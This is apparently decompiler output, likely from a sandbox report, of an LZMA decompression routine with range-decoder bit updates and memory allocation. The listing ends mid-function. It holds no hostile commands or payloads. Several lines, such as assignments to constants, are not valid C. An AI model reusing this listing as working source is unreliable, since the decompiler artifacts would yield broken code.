				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M004074FE))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
